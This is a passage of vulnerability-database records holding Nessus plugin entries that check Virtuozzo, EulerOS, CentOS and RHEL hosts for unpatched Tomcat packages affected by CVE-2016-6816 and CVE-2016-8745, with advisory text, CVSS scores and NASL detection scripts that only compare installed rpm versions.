\"tomcat6-lib-6.0.24-105.vl6\",\n \"tomcat6-servlet-2.5-api-6.0.24-105.vl6\",\n \"tomcat6-webapps-6.0.24-105.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat6 / tomcat6-admin-webapps / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:03:54", "bulletinFamily": "scanner", "description": "According to the versions of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the code that parsed the HTTP\n request line permitted invalid characters. This could\n be exploited, in conjunction with a proxy that also\n permitted the invalid characters but with a different\n interpretation, to inject data into the HTTP response.\n By manipulating the HTTP response the attacker could\n poison a web-cache, perform an XSS attack, or obtain\n sensitive information from requests other then their\n own. (CVE-2016-6816)\n\n - A bug was discovered in the error handling of the send\n file code for the NIO HTTP connector. This led to the\n current Processor object being added to the Processor\n cache multiple times allowing information leakage\n between requests including, and not limited to, session\n ID and the response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2017-1081.NASL", "href": "https://www.tenable.com/plugins/nessus/99947", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP1 : tomcat (EulerOS-SA-2017-1081)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99947);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2016-6816\",\n \"CVE-2016-8745\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : tomcat (EulerOS-SA-2017-1081)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the code that parsed the HTTP\n request line permitted invalid characters. This could\n be exploited, in conjunction with a proxy that also\n permitted the invalid characters but with a different\n interpretation, to inject data into the HTTP response.\n By manipulating the HTTP response the attacker could\n poison a web-cache, perform an XSS attack, or obtain\n sensitive information from requests other then their\n own. (CVE-2016-6816)\n\n - A bug was discovered in the error handling of the send\n file code for the NIO HTTP connector. This led to the\n current Processor object being added to the Processor\n cache multiple times allowing information leakage\n between requests including, and not limited to, session\n ID and the response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1081\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7d6728c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.69-11\",\n \"tomcat-admin-webapps-7.0.69-11\",\n \"tomcat-el-2.2-api-7.0.69-11\",\n \"tomcat-jsp-2.2-api-7.0.69-11\",\n \"tomcat-lib-7.0.69-11\",\n \"tomcat-servlet-3.0-api-7.0.69-11\",\n \"tomcat-webapps-7.0.69-11\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:03:54", "bulletinFamily": "scanner", "description": "According to the versions of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the code that parsed the HTTP\n request line permitted invalid characters. This could\n be exploited, in conjunction with a proxy that also\n permitted the invalid characters but with a different\n interpretation, to inject data into the HTTP response.\n By manipulating the HTTP response the attacker could\n poison a web-cache, perform an XSS attack, or obtain\n sensitive information from requests other then their\n own. (CVE-2016-6816)\n\n - A bug was discovered in the error handling of the send\n file code for the NIO HTTP connector. This led to the\n current Processor object being added to the Processor\n cache multiple times allowing information leakage\n between requests including, and not limited to, session\n ID and the response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2017-1082.NASL", "href": "https://www.tenable.com/plugins/nessus/99948", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2017-1082)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99948);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2016-6816\",\n \"CVE-2016-8745\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2017-1082)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the code that parsed the HTTP\n request line permitted invalid characters. This could\n be exploited, in conjunction with a proxy that also\n permitted the invalid characters but with a different\n interpretation, to inject data into the HTTP response.\n By manipulating the HTTP response the attacker could\n poison a web-cache, perform an XSS attack, or obtain\n sensitive information from requests other then their\n own. (CVE-2016-6816)\n\n - A bug was discovered in the error handling of the send\n file code for the NIO HTTP connector. This led to the\n current Processor object being added to the Processor\n cache multiple times allowing information leakage\n between requests including, and not limited to, session\n ID and the response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1082\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0723940e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.69-11\",\n \"tomcat-admin-webapps-7.0.69-11\",\n \"tomcat-el-2.2-api-7.0.69-11\",\n \"tomcat-jsp-2.2-api-7.0.69-11\",\n \"tomcat-lib-7.0.69-11\",\n \"tomcat-servlet-3.0-api-7.0.69-11\",\n \"tomcat-webapps-7.0.69-11\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:15:43", "bulletinFamily": "scanner", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)", "modified": "2019-11-02T00:00:00", "id": "CENTOS_RHSA-2017-0935.NASL", "href": "https://www.tenable.com/plugins/nessus/99384", "published": "2017-04-14T00:00:00", "title": "CentOS 7 : tomcat (CESA-2017:0935)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0935 and \n# CentOS Errata and Security Advisory 2017:0935 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99384);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/10/02 15:30:21\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8745\");\n script_xref(name:\"RHSA\", value:\"2017:0935\");\n\n script_name(english:\"CentOS 7 : tomcat (CESA-2017:0935)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-April/022384.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6f9e6646\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-admin-webapps-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-docs-webapp-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-el-2.2-api-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-javadoc-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-jsp-2.2-api-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-jsvc-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-lib-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-servlet-3.0-api-7.0.69-11.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-webapps-7.0.69-11.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:21:26", "bulletinFamily": "scanner", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2017-0935.NASL", "href": "https://www.tenable.com/plugins/nessus/99348", "published": "2017-04-13T00:00:00", "title": "RHEL 7 : tomcat (RHSA-2017:0935)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0935. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99348);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8745\");\n script_xref(name:\"RHSA\", value:\"2017:0935\");\n\n script_name(english:\"RHEL 7 : tomcat (RHSA-2017:0935)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8745\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", 